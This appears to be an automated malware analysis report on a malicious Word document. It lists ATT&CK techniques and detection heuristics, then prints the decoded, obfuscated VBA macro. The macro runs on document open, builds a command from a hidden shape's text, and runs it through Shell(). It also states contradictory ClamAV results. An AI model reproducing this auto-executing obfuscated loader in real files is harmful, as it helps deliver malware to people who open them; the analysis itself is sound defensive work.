Verdict: MALICIOUS
Risk Score: 272

Malware Insights

MITRE ATT&CK
- T1059.001 PowerShell
- T1059.003 Windows Command Shell
- T1566.001 Spearphishing Attachment
The sample contains a Document_Open VBA macro that uses the Shell() function to invoke cmd.exe with obfuscated arguments. This indicates an attempt to download and execute a second-stage payload. The presence of PowerShell references and the ClamAV detection as a downloader further support this conclusion. The specific command executed is highly obfuscated, making it difficult to determine the exact payload, hence the 'unknown family' classification.
Heuristics (9)
- ClamAV: Doc.Downloader.Generic-6773945-0 [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Downloader.Generic-6773945-0
- VBA macros detected [medium, OLE_VBA_MACROS, 3 related findings]: Document contains VBA macro code
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]: Potential Shell call in VBA. Matched line in script: `End Select lMzVX = Array(bMjiiU, dOjutwL, tmRQGMYr, Interaction@.Shell(IslbJ, hwivkhmtIY), MumMhwRW) Select Case jSzXLUGKWHsnmlGnfw`
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Document_Open macro [low, OLE_VBA_DOCOPEN]: Document_Open macro. Matched line in script: `Attribute VB_Customizable = True Private Sub Document_open() On Error Resume Next`
- Suspicious cmd.exe invocation with execution flag [high, SC_STR_CMD]: Suspicious cmd.exe invocation with execution flag
- Reference to PowerShell [high, SC_STR_POWERSHELL]: Reference to PowerShell
- Suspicious extracted artifact [info, EXTRACTED_FILE_STATIC_TRIAGE]: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL [info, EMBEDDED_URL]: One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 6424 bytes |

SHA-256: 8ccba8097a1ae50e78451f9d45097f2bc028a9d498ae3e8f8fb4604b07fc8b89

Detection
- ClamAV: No threats found
- Obfuscation or payload: likely. 139 of 173 identifiers look randomly generated (e.g. 'ukPwbhAHbBCAhssHvrFWswws'), consistent with name-mangling obfuscation.
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "fqccqJYYpXCuhi"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
On Error Resume Next
Select Case IHLqsQXuiXFKJAfSwJF
Case 11923683
jVwBdQpPnqVIhWlYfmpz = 107668513
ZPfTNuijUDwvbmOpPzhiu = 216763862
CbittSXQDNzvhWJCukHWR = ChrB(78593326 / ChrB(249914798))
zJpWpQlmsicsjBkNwmsicqj = FzmunKTqpjujcAbncM
Case 24653730
tRStAtZiTDSIdW = 113400267
drzhLmCAGAlwLEGPmiaoitu = 303397485
oWmRmGGjjKkNWrGPSnzIc = ChrB(123884707 / ChrB(97660963))
CVwwdMjzFvXPQiUtiNcuVCQm = 129693693
End Select
Select Case HGUhvqSdZdmpItfnMQ
Case 73871388
hBVwlonSiXQPTIHjzuEPtziX = 281847765
LtWUPDspoGkXwGDA = 307477493
MXVAmwnSLwChWw = ChrB(36977067 / ChrB(160426740))
uwNINXdTBwbzzMsEcKTr = GZjwrwmGjmSYdIEj
Case 301014852
ArjlzMUOkKcunmjSnWhLWbrN = 118968193
JZTDoYiLTziVcUcc = 78955515
dowjrLVhzicZATTkCuu = ChrB(218407591 / ChrB(147191719))
LcThoStMjtPOjd = 96160963
End Select
Select Case BLkIKAsQYliSmBzjNbMVsVv
Case 204924334
tScoctnlrzXZcYpdJnBVzu = 58872329
pUBEjCfQFTRhQbwrrjuEcJl = 18575756
sjiuJszJizIsiFpRGU = ChrB(63325481 / ChrB(49172097))
MhqJiRzERfjwioS = WvaSYicowIbEmVpbvNfCskfb
Case 337312069
QTYuARWVkZipjdE = 12385565
WpvRwqHDUIQElQzT = 126865894
JPEHKhRkPsGiBzqZI = ChrB(246758747 / ChrB(25932683))
TdRrjIGQzIjVQLvmFPfNzM = 173276850
End Select
Select Case ARcoFzOaDwBFuiVKHisonKIU
Case 52290657
qEiBOpoqvBOtmTiazp = 338865078
DsnYikALJpJIjlHKsB = 227293789
QDiUvOwYFMNSVmQz = ChrB(109825708 / ChrB(65250289))
dochGsGMALXivHnEzK = cQnbGwbrmuVKtiiEXn
Case 147776069
cpBwNhiRLhhQnzhHpMW = 240374422
BTSiAiARCQRdhrnOqOYS = 69530781
FMFXwAXOKQlzbVjSMDiz = ChrB(57644217 / ChrB(110769514))
nFFuswwwSTVOFZdhz = 306196005
End Select
Select Case qKfcSRJGtsdcKz
Case 104973361
GSzNaHwfdvKNktiqjknW = 72806225
iRFjcuqNnTWdislRb = 227060562
AwXHvWzNmtaMtUrn = ChrB(214272748 / ChrB(49802717))
fEpQIqrGOmFRJEKLQHJKKcj = UNGcInEEKhDHKi
Case 99309868
DPkahbQIjJbfXziCX = 250575484
ukPwbhAHbBCAhssHvrFWswws = 334775248
ZhMzAjYmUjnRJsjT = ChrB(269085028 / ChrB(43637034))
JtniqnKSPCzlWzOITucB = 125295459
End Select
Select Case BTLBQCLmccAvmzIV
Case 151306045
zBMMiFhAFIzNzAuuMNmNC = 136177019
qcwdtHNBazjXQwplFUPwCnPi = 339217578
sluiJhfCWjkcnt = ChrB(291587964 / ChrB(44800953))
NRcivXcjtmYvDMTdsPc = rqwsNbFBcjWEwNC
Case 87767021
WwNRBPvHGTWQzudQzh = 149362639
kQTRbDMQUzpKGHWTO = 276220196
aDlHHikdmsowjfumFcvqzC = ChrB(204043726 / ChrB(256755992))
iMKsXKBJrvOwJLj = 281638815
End Select
Select Case zJiNQoMptPUvfhVZFAUvQr
Case 319545969
pcOIOCipLpnmizj = 231940789
SNoAlSqkudIicZIMZ = 155985340
ZDbrlfjptjrGRlfwiIHDJY = ChrB(160015397 / ChrB(129769927))
VKjQfaIbvJMrWDVBdwB = XrtwadESTiBfHS
Case 106020854
AZNIiiWcSGHEmCjbXQ = 11035420
RmpBVqHQHhkEmBBDisTs = 137820627
iTVzfRwaIqQlCOjMn = ChrB(294291446 / ChrB(150808599))
UlWDSkBcsiwJJAI = 143721182
End Select
Select Case PJrOIZsqbwTjwnzwF
Case 260636522
ccmQbEaDohjwhNmYtvmN = 221231197
XorYEjzBcNSiAoctQKhVEJr = 2220262
WMOECTawkFwZCzuDmEWdz = ChrB(89905991 / ChrB(329497994))
AfcfMoNwrmiTkwZusmPjiUNK = RREVWmIOTEXqukwrChPQaS
Case 278028665
blMzPQjRStuXIaUAaFRs = 12840025
zCTrcmztLwaZul = 171412970
zCYFYBpZibNPqUBz = ChrB(191215252 / ChrB(152000972))
KdXouUYhvwijiaPGPUwjwM = 308369880
End Select
Set KqShZtn = Shapes("zTnWboDjz").TextFrame
Select Case jYwhGpospcJhTCQICNLDYTiw
Case 283111683
TbSGqnPdjspjBjkcwRuhFL = 161747128
XinsbNpwqRWMail = 144916242
pSXSVLfSvUREJjIDL = ChrB(230210477 / ChrB(52206993))
XCWDrqkJYCQjYPPsBoCXIZfs = ujhNJOzdWunwTbibVut
Case 31742893
fuUQCXjkrzWifzKCwOnQD = 11963153
bvhNXwmimnnOmNzHqS = 294502752
zQSodUYZfFohdZsUUKJo = ChrB(31955564 / ChrB(126089235))
qsjXpwHzzKWXLdtjDYMwj = 336191429
End Select
IslbJ = KqShZtn.ContainingRange + fbvuwib + UcmjJE + qXHBh + KVVVQoFw + BzpHpla + aFQsUEr + idLnl + vlNFC + RLIBq + DoiJb + waHtfjE
Select Case zbVzcnDwwoiqjDnUHQkT
Case 233189304
JfzpRUinWqcaQzuwYQWpijNq = 239841154
KEqIFYuzRqAmWiSJSoOFmnaL = 289236232
wuPdSJFVKZwOkEjRhD = ChrB(313089259 / ChrB(249189544))
nWYOZbiJWiiQmbzkoYrhBYs = DDKYVGWQGZJXqOsh
Case 173753268
ovSwwchjsfEEsPiL = 74236973
RGnPIOKNSctafKHpjw = 305216977
FhrpNqMBjttiDXP = ChrB(132862406 / ChrB(162731637))
nEolKEnSAtzDfhRGQkO = 330270037
End Select
Select Case rzKnTXbpvNbwGbjEEJVBaBP
Case 218911476
pnnkPkQdAwTtpuolHLSdiP = 304270849
bAcAWUqkdzikoEjcLS = 37461052
QKOPhQTqwDLZtUJPHPGj = ChrB(49682531 / ChrB(231467132))
sPEzCipRLKQCQlMTG = AnZlFqUvQVwLZV
Case 217464738
WAcTQLHlAPcRsduvAfHvqHK = 92402398
HNUVzkvVWPMqnkojnlpO = 19242818
naALuOlDPpOpJz = ChrB(253377178 / ChrB(109676256))
ihvVNiFNuSPCWU = 23816
End Select
Select Case lJTSWACZprkOSHCNhVTB
Case 179078868
XfziNjSifVAVHKuziW = 271578057
XwQvkFIOhwHTEOmoVr = 258081281
GGMPOwArSkmzMEAaOB = ChrB(305735228 / ChrB(52703745))
EBhNjQsYGbrjTQQkBhn = QvzLKHzOLZTzfz
Case 14078204
fBhjHTLIvNtojqN = 133651546
DIIDVDZQiMhIuEW = 93667656
EzzHwwjoQwNLiVLz = ChrB(278371078 / ChrB(182879795))
tBJzIPdHiABIWZYlNVzGMY = 97283279
End Select
Const hwivkhmtIY = 0
Select Case TapSUSsHXiNHFzVpLu
Case 218959317
YwwRHCjrsnAiiFBMPXbrlI = 247756767
kYjFtAzjazzWdXLS = 252120396
PjdiZzwJanSpEP = ChrB(72678990 / ChrB(229020059))
jSawrnQIkFijrMJFktBkG = kHkaMQksjLuqbALCXwMWotTa
Case 225282936
JkUWJwbkhTORbzXrWTo = 10830777
IuhVFXjKqoKslHAYNCwOr = 123510855
oGUMwwXAljpBqmBDbrZrfEY = ChrB(277053112 / ChrB(292989798))
TIQrmtpCtOlKlNSnYL = 312485959
End Select
lMzVX = Array(bMjiiU, dOjutwL, tmRQGMYr, Interaction@.Shell(IslbJ, hwivkhmtIY), MumMhwRW)
Select Case jSzXLUGKWHsnmlGnfw
Case 157492416
SWdTciiAaorZIuiF = 216571392
kdcvoSEphBwHQsSiENoiudmF = 237637719
QSfsCAGiNujWhKPmAjESY = ChrB(333220436 / ChrB(52017137))
pVQCBHrXLGClKpwvBhfX = hfiPIdFARJRLBDhkDjGCJLbI
Case 194755816
KiJRrTjfHpmntdlWuzka = 54262363
RKzAYUoWEVlfSXrzSwbWvr = 330222026
mcRnQiYDUYQwTquPq = ChrB(241937393 / ChrB(242778835))
COLNiuilzlqZMiNwD = 9144250
End Select
End Sub